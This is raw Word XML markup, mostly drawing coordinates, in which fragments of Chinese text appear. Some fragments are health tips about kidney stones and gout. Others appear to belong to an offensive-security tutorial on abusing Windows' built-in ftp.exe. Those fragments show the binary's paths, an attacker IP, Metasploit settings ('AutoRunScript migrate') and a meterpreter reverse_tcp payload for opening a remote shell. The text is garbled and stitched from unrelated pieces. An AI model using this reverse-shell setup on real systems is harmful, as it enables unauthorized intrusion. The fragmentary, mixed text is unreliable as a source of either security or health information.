686,6990,14686,6989,14686,6987,14686,6986,14686,6985,14686,6984,14686,6982,14686,6981,14686,6980,14686,6978,14686,6977,14686,6975,14686,6974,14686,6972,14686,6971,14686,6969,14686,6967,14686,6966,14686,6964,14686,6962,14686,6960,14686,6958,14686,6956,14686,6955,14686,6953,14686,6950,14686,6948,14686,6946,14686,6944,14686,6942,14686,6940,14686,6937,14686,6935,14686,6933,14686,6930,14686,6928,14686,6925,14686,6923,14686,6920,14686,6917,14686,6915,14686,6912,14686,6909,14686,6906,14686,6903,14686,6900,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14686,6897,14685,6897,14685,6897,14685,6897,14685,6897,14685,6897,14684,6897,14684,6897,14684,6897,14683,6897,14683,6897,14683,6897,14682,6897,14682,6897,14681,6897,14681,6897,14680,6897,14680,6897,14679,6897,14679,6897,14678,6897,14677,6897,14677,6897,14676,6897,14675,6897,14674,6897,14674,6897,14673,6897,14672,6897,14671,6897,14670,6897,14669,6897,14667,6897,14666,6897,14665,6897,14664,6897,14663,6897,14661,6897,14660,6897,14658,6897,14657,6897,14655,6897,14654,6897,14652,6897,14650,6897,14649,6897,14647,6897,14645,6897,14643,6897,14641,6897,14639,6897,14637,6897,14634,6897,14632,6897,14630,6897,14628,6897,14625,6897,14623,6897,14620,6897,14617,6897,14615,6897,14612,6897,14609,6897,14606,6897,14603,6897,14600,6897,14597,6897,14593,6897,14590,6897,14587,6897,14583,6897,14580,6897,14576,6897,14572,6897,14569,6897,14565,6897,14561,6897,14557,6897,14552,6897,14548,6897,14544,6897,14540,6897,14535,6897,14530,6897,14526,6897,14521,6897,14516,6897,14511,6897,14506,6897,14501,6897,14496,6897,14490,6897,14485,6897,14479,6897,14474,6897,14468,6897,14462,6897,14456,6897,14450,6897,14444,6897,14438,6897,14431e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.874pt;margin-top:771.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4817,15437" coordsize="142,282">
        <v:shape style="position:absolute;left:4817;top:15437;width:142;height:282" coordorigin="4817,15437" coordsize="142,282" path="m4856,15467l4856,15467,4856,15467,4856,15467,4856,15467,4856,15467,4856,15467,4856,15467,4856,15467,4856,15467,4856,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4857,15467,4858,15467,4858,15467,4858,15467,4858,15467,4858,15467,4858,15467,4859,15467,4859,15467,4859,15467,4859,15467,4860,15467,4860,15467,4860,15467,4860,15467,4861,15467,4861,15467,4861,15467,4862,15467,4862,15467,4863,15467,4863,15467,4863,15467,4864,15467,4864,15467,4865,15467,4865,15467,4866,15467,4866,15467,4867,15467,4868,15467,4868,15467,4869,15467,4870,15467,4870,15467,4871,15467,4872,15467,4873,15467,4873,15467,4874,15467,4875,15467,4876,15467,4877,15467,4878,15467,4879,15467,4880,15467,4881,15467,4882,15467,4883,15467,4884,15467,4885,15467,4887,15467,4888,15467,4889,15467,4890,15467,4892,15467,4893,15467,4894,15467,4896,15467,4897,15467,4899,15467,4900,15467,4902,15467,4903,15467,4905,15467,4907,15467,4908,15467,4910,15467,4912,15467,4914,15467,4916,15467,4918,15467,4919,15467,4921,15467,4924,15467,4926,15467,4928,15467,4930,15467,4932,15467,4934,15467,4937,15467,4939,15467,4941,15467,4944,15467,4946,15467,4949,15467,4951,15467,4954,15467,4957,15467,4959,15467,4962,15467,4965,15467,4968,15467,4971,15467,4974,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15467,4977,15468,4977,15468,4977,15468,4977,15468,4977,15468,4977,15468,4977,15469,4977,15469,4977,15469,4977,15469,4977,15470,4977,15470,4977,15470,4977,15471,4977,15471,4977,15472,4977,15472,4977,15473,4977,15473,4977,15474,4977,15474,4977,15475,4977,15476,4977,15476,4977,15477,4977,15478,4977,15479,4977,15480,4977,15481,4977,15482,4977,15483,4977,15484,4977,15485,4977,15486,4977,15487,4977,15488,4977,15489,4977,15491,4977,15492,4977,15493,4977,15495,4977,15496,4977,15498,4977,15499,4977,15501,4977,15503,4977,15505,4977,15506,4977,15508,4977,15510,4977,15512,4977,15514,4977,15517,4977,15519,4977,15521,4977,15523,4977,15526,4977,15528,4977,15531,4977,15533,4977,15536,4977,15539,4977,15541,4977,15544,4977,15547,4977,15550,4977,15553,4977,15557,4977,15560,4977,15563,4977,15566,4977,15570,4977,15574,4977,15577,4977,15581,4977,15585,4977,15589,4977,15593,4977,15597,4977,15601,4977,15605,4977,15609,4977,15614,4977,15618,4977,15623,4977,15627,4977,15632,4977,15637,4977,15642,4977,15647,4977,15652,4977,15658,4977,15663,4977,15668,4977,15674,4977,15679,4977,15685,4977,15691,4977,15697,4977,15703,4977,15709,4977,15716,4977,15722,4977,15722,4977,15722,4977,15722,4977,15722,4977,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4976,15722,4975,15722,4975,15722,4975,15722,4975,15722,4975,15722,4975,15722,4974,15722,4974,15722,4974,15722,4974,15722,4973,15722,4973,15722,4973,15722,4973,15722,4972,15722,4972,15722,4972,15722,4971,15722,4971,15722,4970,15722,4970,15722,4970,15722,4969,15722,4969,15722,4968,15722,4968,15722,4967,15722,4966,15722,4966,15722,4965,15722,4965,15722,4964,15722,4963,15722,4963,15722,4962,15722,4961,15722,4960,15722,4960,15722,4959,15722,4958,15722,4957,15722,4956,15722,4955,15722,4954,15722,4953,15722,4952,15722,4951,15722,4950,15722,4949,15722,4948,15722,4946,15722,4945,15722,4944,15722,4943,15722,4941,15722,4940,15722,4939,15722,4937,15722,4936,15722,4934,15722,4933,15722,4931,15722,4930,15722,4928,15722,4926,15722,4925,15722,4923,15722,4921,15722,4919,15722,4917,15722,4915,15722,4913,15722,4911,15722,4909,15722,4907,15722,4905,15722,4903,15722,4901,15722,4899,15722,4896,15722,4894,15722,4892,15722,4889,15722,4887,15722,4884,15722,4882,15722,4879,15722,4876,15722,4874,15722,4871,15722,4868,15722,4865,15722,4862,15722,4859,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15722,4856,15721,4856,15721,4856,15721,4856,15721,4856,15721,4856,15721,4856,15721,4856,15720,4856,15720,4856,15720,4856,15720,4856,15719,4856,15719,4856,15719,4856,15718,4856,15718,4856,15717,4856,15717,4856,15716,4856,15716,4856,15715,4856,15715,4856,15714,4856,15714,4856,15713,4856,15712,4856,15711,4856,15711,4856,15710,4856,15709,4856,15708,4856,15707,4856,15706,4856,15705,4856,15704,4856,15703,4856,15702,4856,15701,4856,15699,4856,15698,4856,15697,4856,15695,4856,15694,4856,15692,4856,15691,4856,15689,4856,15688,4856,15686,4856,15684,4856,15682,4856,15680,4856,15678,4856,15676,4856,15674,4856,15672,4856,15670,4856,15668,4856,15665,4856,15663,4856,15661,4856,15658,4856,15655,4856,15653,4856,15650,4856,15647,4856,15644,4856,15641,4856,15638,4856,15635,4856,15632,4856,15629,4856,15626,4856,15622,4856,15619,4856,15615,4856,15612,4856,15608,4856,15604,4856,15600,4856,15596,4856,15592,4856,15588,4856,15584,4856,15579,4856,15575,4856,15571,4856,15566,4856,15561,4856,15556,4856,15552,4856,15547,4856,15542,4856,15536,4856,15531,4856,15526,4856,15520,4856,15515,4856,15509,4856,15503,4856,15498,4856,15492,4856,15486,4856,15479,4856,15473,4856,15467e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.874pt;margin-top:771.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6257,15437" coordsize="142,282">
        <v:shape style="position:absolute;left:6257;top:15437;width:142;height:282" coordorigin="6257,15437" coordsize="142,282" path="m6297,15467l6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6297,15467,6298,15467,6298,15467,6298,15467,6298,15467,6298,15467,6298,15467,6298,15467,6298,15467,6298,15467,6298,15467,6299,15467,6299,15467,6299,15467,6299,15467,6299,15467,6300,15467,6300,15467,6300,15467,6300,15467,6300,15467,6301,15467,6301,15467,6301,15467,6302,15467,6302,15467,6302,15467,6303,15467,6303,15467,6304,15467,6304,15467,6305,15467,6305,15467,6306,15467,6306,15467,6307,15467,6307,15467,6308,15467,6308,15467,6309,15467,6310,15467,6310,15467,6311,15467,6312,15467,6313,15467,6313,15467,6314,15467,6315,15467,6316,15467,6317,15467,6318,15467,6319,15467,6320,15467,6321,15467,6322,15467,6323,15467,6324,15467,6325,15467,6326,15467,6327,15467,6328,15467,6330,15467,6331,15467,6332,15467,6334,15467,6335,15467,6336,15467,6338,15467,6339,15467,6341,15467,6342,15467,6344,15467,6346,15467,6347,15467,6349,15467,6351,15467,6353,15467,6354,15467,6356,15467,6358,15467,6360,15467,6362,15467,6364,15467,6366,15467,6368,15467,6371,15467,6373,15467,6375,15467,6377,15467,6380,15467,6382,15467,6384,15467,6387,15467,6389,15467,6392,15467,6395,15467,6397,15467,6400,15467,6403,15467,6406,15467,6408,15467,6411,15467,6414,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15467,6417,15468,6417,15468,6417,15468,6417,15468,6417,15468,6417,15468,6417,15469,6417,15469,6417,15469,6417,15469,6417,15470,6417,15470,6417,15470,6417,15471,6417,15471,6417,15472,6417,15472,6417,15473,6417,15473,6417,15474,6417,15474,6417,15475,6417,15476,6417,15476,6417,15477,6417,15478,6417,15479,6417,15480,6417,15481,6417,15482,6417,15483,6417,15484,6417,15485,6417,15486,6417,15487,6417,15488,6417,15489,6417,15491,6417,15492,6417,15493,6417,15495,6417,15496,6417,15498,6417,15499,6417,15501,6417,15503,6417,15505,6417,15506,6417,15508,6417,15510,6417,15512,6417,15514,6417,15517,6417,15519,6417,15521,6417,15523,6417,15526,6417,15528,6417,15531,6417,15533,6417,15536,6417,15539,6417,15541,6417,15544,6417,15547,6417,15550,6417,15553,6417,15557,6417,15560,6417,15563,6417,15566,6417,15570,6417,15574,6417,15577,6417,15581,6417,15585,6417,15589,6417,15593,6417,15597,6417,15601,6417,15605,6417,15609,6417,15614,6417,15618,6417,15623,6417,15627,6417,15632,6417,15637,6417,15642,6417,15647,6417,15652,6417,15658,6417,15663,6417,15668,6417,15674,6417,15679,6417,15685,6417,15691,6417,15697,6417,15703,6417,15709,6417,15716,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6417,15722,6416,15722,6416,15722,6416,15722,6416,15722,6416,15722,6416,15722,6416,15722,6415,15722,6415,15722,6415,15722,6415,15722,6415,15722,6414,15722,6414,15722,6414,15722,6414,15722,6413,15722,6413,15722,6413,15722,6412,15722,6412,15722,6412,15722,6411,15722,6411,15722,6410,15722,6410,15722,6409,15722,6409,15722,6408,15722,6408,15722,6407,15722,6407,15722,6406,15722,6405,15722,6405,15722,6404,15722,6403,15722,6403,15722,6402,15722,6401,15722,6400,15722,6399,15722,6399,15722,6398,15722,6397,15722,6396,15722,6395,15722,6394,15722,6393,15722,6392,15722,6391,15722,6390,15722,6388,15722,6387,15722,6386,15722,6385,15722,6383,15722,6382,15722,6381,15722,6379,15722,6378,15722,6376,15722,6375,15722,6373,15722,6372,15722,6370,15722,6369,15722,6367,15722,6365,15722,6364,15722,6362,15722,6360,15722,6358,15722,6356,15722,6354,15722,6352,15722,6350,15722,6348,15722,6346,15722,6344,15722,6342,15722,6339,15722,6337,15722,6335,15722,6332,15722,6330,15722,6327,15722,6325,15722,6322,15722,6320,15722,6317,15722,6314,15722,6312,15722,6309,15722,6306,15722,6303,15722,6300,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15722,6297,15721,6297,15721,6297,15721,6297,15721,6297,15721,6297,15721,6297,15721,6297,15720,6297,15720,6297,15720,6297,15720,6297,15719,6297,15719,6297,15719,6297,15718,6297,15718,6297,15717,6297,15717,6297,15716,6297,15716,6297,15715,6297,15715,6297,15714,6297,15714,6297,15713,6297,15712,6297,15711,6297,15711,6297,15710,6297,15709,6297,15708,6297,15707,6297,15706,6297,15705,6297,15704,6297,15703,6297,15702,6297,15701,6297,15699,6297,15698,6297,15697,6297,15695,6297,15694,6297,15692,6297,15691,6297,15689,6297,15688,6297,15686,6297,15684,6297,15682,6297,15680,6297,15678,6297,15676,6297,15674,6297,15672,6297,15670,6297,15668,6297,15665,6297,15663,6297,15661,6297,15658,6297,15655,6297,15653,6297,15650,6297,15647,6297,15644,6297,15641,6297,15638,6297,15635,6297,15632,6297,15629,6297,15626,6297,15622,6297,15619,6297,15615,6297,15612,6297,15608,6297,15604,6297,15600,6297,15596,6297,15592,6297,15588,6297,15584,6297,15579,6297,15575,6297,15571,6297,15566,6297,15561,6297,15556,6297,15552,6297,15547,6297,15542,6297,15536,6297,15531,6297,15526,6297,15520,6297,15515,6297,15509,6297,15503,6297,15498,6297,15492,6297,15486,6297,15479,6297,15473,6297,1546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请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石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，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。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痛风可伴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。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Ftp.ex</w:t>
      </w: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e简介：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638" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1793" w:firstLine="0"/>
      </w:pP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Ftp.exe是Windows本身自带的一个程序，属于微软FTP工具，提供基本的FT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P访问。</w:t>
      </w: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说明：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Ftp.exe所在路径已被系统添加PATH环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境变量中，因此，Ftp.exe命令可识别。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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="213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:\Windows\System32\ftp.exe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:\Windows\SysWOW64\ftp.exe</w:t>
      </w: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8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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pP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:\Windows\System32\ftp.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:\Windows\SysWOW64\ftp.exe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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131" w:firstLine="0"/>
      </w:pP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192.168.1.3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7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配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置攻击机msf：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需设置参数set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AutoRunScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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-f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491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346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="515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Module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479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Payload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meterpreter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reverse_tcp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416.934pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,8338">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:8338" coordorigin="10402,0" coordsize="0,8338" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,10,10402,13,10402,16,10402,20,10402,24,10402,28,10402,33,10402,39,10402,45,10402,52,10402,60,10402,68,10402,77,10402,86,10402,97,10402,108,10402,120,10402,133,10402,147,10402,162,10402,177,10402,194,10402,212,10402,230,10402,250,10402,271,10402,293,10402,316,10402,341,10402,366,10402,393,10402,421,10402,450,10402,481,10402,513,10402,547,10402,582,10402,618,10402,656,10402,695,10402,736,10402,779,10402,823,10402,869,10402,916,10402,965,10402,1016,10402,1068,10402,1123,10402,1179,10402,1237,10402,1297,10402,1358,10402,1422,10402,1488,10402,1555,10402,1625,10402,1697,10402,1771,10402,1846,10402,1924,10402,2005,10402,2087,10402,2172,10402,2259,10402,2348,10402,2439,10402,2533,10402,2629,10402,2728,10402,2829,10402,2932,10402,3038,10402,3147,10402,3258,10402,3372,10402,3488,10402,3607,10402,3728,10402,3853,10402,3980,10402,4109,10402,4242,10402,4377,10402,4516,10402,4657,10402,4801,10402,4948,10402,5098,10402,5251,10402,5407,10402,5566,10402,5728,10402,5893,10402,6061,10402,6233,10402,6408,10402,6586,10402,6767,10402,6952,10402,7139,10402,7331,10402,7525,10402,7723,10402,7925,10402,8130,10402,8338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3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8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1000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1000l1517,1000,1517,1000,1517,1000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3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8.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1330" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1330;width:8990;height:370" coordorigin="1490,1330" coordsize="8990,37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8,10484,1349,10484,1349,10484,1350,10484,1350,10484,1351,10484,1352,10484,1352,10484,1353,10484,1354,10484,1355,10484,1356,10484,1356,10484,1357,10484,1358,10484,1359,10484,1361,10484,1362,10484,1363,10484,1364,10484,1365,10484,1367,10484,1368,10484,1370,10484,1371,10484,1373,10484,1375,10484,1376,10484,1378,10484,1380,10484,1382,10484,1384,10484,1386,10484,1389,10484,1391,10484,1393,10484,1396,10484,1398,10484,1401,10484,1403,10484,1406,10484,1409,10484,1412,10484,1415,10484,1418,10484,1421,10484,1424,10484,1428,10484,1431,10484,1435,10484,1439,10484,1442,10484,1446,10484,1450,10484,1454,10484,1458,10484,1463,10484,1467,10484,1471,10484,1476,10484,1481,10484,1485,10484,1490,10484,1495,10484,1500,10484,1506,10484,1511,10484,1517,10484,1522,10484,1528,10484,1534,10484,1540,10484,1546,10484,1552,10484,1558,10484,1565,10484,1571,10484,1578,10484,1585,10484,1592,10484,1599,10484,1607,10484,1614,10484,1621,10484,1629,10484,1637,10484,1645,10484,1653,10484,1661,10484,1670,10484,1678,10484,1687,10484,1696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4,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1703,1510,1703,1510,1703,1510,1703,1510,1702,1510,1702,1510,1702,1510,1701,1510,1701,1510,1700,1510,1700,1510,1699,1510,1698,1510,1698,1510,1697,1510,1696,1510,1696,1510,1695,1510,1694,1510,1693,1510,1692,1510,1691,1510,1690,1510,1689,1510,1688,1510,1687,1510,1685,1510,1684,1510,1683,1510,1681,1510,1680,1510,1678,1510,1677,1510,1675,1510,1673,1510,1671,1510,1669,1510,1667,1510,1665,1510,1663,1510,1661,1510,1659,1510,1656,1510,1654,1510,1651,1510,1649,1510,1646,1510,1643,1510,1641,1510,1638,1510,1635,1510,1632,1510,1628,1510,1625,1510,1622,1510,1618,1510,1615,1510,1611,1510,1607,1510,1603,1510,1599,1510,1595,1510,1591,1510,1587,1510,1583,1510,1578,1510,1574,1510,1569,1510,1564,1510,1559,1510,1554,1510,1549,1510,1544,1510,1538,1510,1533,1510,1527,1510,1522,1510,1516,1510,1510,1510,1504,1510,1497,1510,1491,1510,1485,1510,1478,1510,1471,1510,1464,1510,1457,1510,1450,1510,1443,1510,1436,1510,1428,1510,1420,1510,1413,1510,1405,1510,1396,1510,1388,1510,1380,1510,1371,1510,1363,1510,1354,1510,1345e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:66.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1330" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1330;width:30;height:370" coordorigin="1490,1330" coordsize="30,370" path="m1517,1345l1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1345,1517,1346,1517,1346,1517,1346,1517,1346,1517,1346,1517,1347,1517,1347,1517,1347,1517,1348,1517,1348,1517,1348,1517,1349,1517,1349,1517,1350,1517,1350,1517,1351,1517,1352,1517,1352,1517,1353,1517,1354,1517,1355,1517,1356,1517,1356,1517,1357,1517,1358,1517,1359,1517,1361,1517,1362,1517,1363,1517,1364,1517,1365,1517,1367,1517,1368,1517,1370,1517,1371,1517,1373,1517,1375,1517,1376,1517,1378,1517,1380,1517,1382,1517,1384,1517,1386,1517,1389,1517,1391,1517,1393,1517,1396,1517,1398,1517,1401,1517,1403,1517,1406,1517,1409,1517,1412,1517,1415,1517,1418,1517,1421,1517,1424,1517,1428,1517,1431,1517,1435,1517,1439,1517,1442,1517,1446,1517,1450,1517,1454,1517,1458,1517,1463,1517,1467,1517,1471,1517,1476,1517,1481,1517,1485,1517,1490,1517,1495,1517,1500,1517,1506,1517,1511,1517,1517,1517,1522,1517,1528,1517,1534,1517,1540,1517,1546,1517,1552,1517,1558,1517,1565,1517,1571,1517,1578,1517,1585,1517,1592,1517,1599,1517,1607,1517,1614,1517,1621,1517,1629,1517,1637,1517,1645,1517,1653,1517,1661,1517,1670,1517,1678,1517,1687,1517,1696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7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7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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:2070;width:8990;height:630" coordorigin="1490,2070" coordsize="8990,63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1,10484,2081,10484,2081,10484,2081,10484,2081,10484,2082,10484,2082,10484,2082,10484,2083,10484,2083,10484,2084,10484,2084,10484,2085,10484,2085,10484,2086,10484,2087,10484,2087,10484,2088,10484,2089,10484,2090,10484,2091,10484,2092,10484,2093,10484,2095,10484,2096,10484,2097,10484,2099,10484,2101,10484,2102,10484,2104,10484,2106,10484,2108,10484,2110,10484,2112,10484,2114,10484,2116,10484,2119,10484,2121,10484,2124,10484,2127,10484,2130,10484,2133,10484,2136,10484,2139,10484,2142,10484,2146,10484,2149,10484,2153,10484,2157,10484,2161,10484,2165,10484,2169,10484,2174,10484,2178,10484,2183,10484,2188,10484,2193,10484,2198,10484,2203,10484,2208,10484,2214,10484,2220,10484,2226,10484,2232,10484,2238,10484,2244,10484,2251,10484,2258,10484,2264,10484,2272,10484,2279,10484,2286,10484,2294,10484,2302,10484,2310,10484,2318,10484,2326,10484,2335,10484,2344,10484,2353,10484,2362,10484,2371,10484,2381,10484,2391,10484,2401,10484,2411,10484,2421,10484,2432,10484,2443,10484,2454,10484,2465,10484,2477,10484,2489,10484,2501,10484,2513,10484,2526,10484,2538,10484,2551,10484,2564,10484,2578,10484,2592,10484,2606,10484,2620,10484,2634,10484,2649,10484,2664,10484,2679,10484,2695,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10484,2710,10483,2710,10482,2710,10482,2710,10480,2710,10479,2710,10477,2710,10475,2710,10473,2710,10470,2710,10466,2710,10462,2710,10458,2710,10453,2710,10448,2710,10442,2710,10435,2710,10428,2710,10419,2710,10411,2710,10401,2710,10391,2710,10379,2710,10367,2710,10354,2710,10340,2710,10326,2710,10310,2710,10293,2710,10275,2710,10256,2710,10236,2710,10215,2710,10192,2710,10168,2710,10143,2710,10117,2710,10090,2710,10061,2710,10031,2710,9999,2710,9966,2710,9931,2710,9895,2710,9858,2710,9819,2710,9778,2710,9735,2710,9691,2710,9646,2710,9598,2710,9549,2710,9498,2710,9445,2710,9391,2710,9334,2710,9275,2710,9215,2710,9153,2710,9088,2710,9022,2710,8953,2710,8883,2710,8810,2710,8735,2710,8658,2710,8578,2710,8497,2710,8413,2710,8326,2710,8238,2710,8146,2710,8053,2710,7957,2710,7859,2710,7758,2710,7654,2710,7548,2710,7439,2710,7328,2710,7214,2710,7097,2710,6977,2710,6855,2710,6730,2710,6602,2710,6471,2710,6337,2710,6201,2710,6061,2710,5918,2710,5773,2710,5624,2710,5472,2710,5317,2710,5159,2710,4997,2710,4833,2710,4665,2710,4494,2710,4319,2710,4141,2710,3960,2710,3776,2710,3587,2710,3396,2710,3201,2710,3002,2710,2800,2710,2594,2710,2385,2710,2172,2710,1955,2710,1734,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2710,1510,2709,1510,2709,1510,2709,1510,2709,1510,2708,1510,2708,1510,2707,1510,2707,1510,2706,1510,2706,1510,2705,1510,2705,1510,2704,1510,2703,1510,2702,1510,2701,1510,2700,1510,2699,1510,2698,1510,2697,1510,2696,1510,2694,1510,2693,1510,2691,1510,2690,1510,2688,1510,2686,1510,2685,1510,2683,1510,2681,1510,2679,1510,2676,1510,2674,1510,2672,1510,2669,1510,2666,1510,2664,1510,2661,1510,2658,1510,2655,1510,2651,1510,2648,1510,2645,1510,2641,1510,2637,1510,2634,1510,2630,1510,2625,1510,2621,1510,2617,1510,2612,1510,2608,1510,2603,1510,2598,1510,2593,1510,2587,1510,2582,1510,2576,1510,2571,1510,2565,1510,2559,1510,2553,1510,2546,1510,2540,1510,2533,1510,2526,1510,2519,1510,2512,1510,2504,1510,2496,1510,2489,1510,2481,1510,2472,1510,2464,1510,2455,1510,2447,1510,2438,1510,2428,1510,2419,1510,2410,1510,2400,1510,2390,1510,2379,1510,2369,1510,2358,1510,2347,1510,2336,1510,2325,1510,2313,1510,2302,1510,2290,1510,2277,1510,2265,1510,2252,1510,2239,1510,2226,1510,2213,1510,2199,1510,2185,1510,2171,1510,2156,1510,2141,1510,2127,1510,2111,1510,2096,1510,2080e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:103.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="30,630">
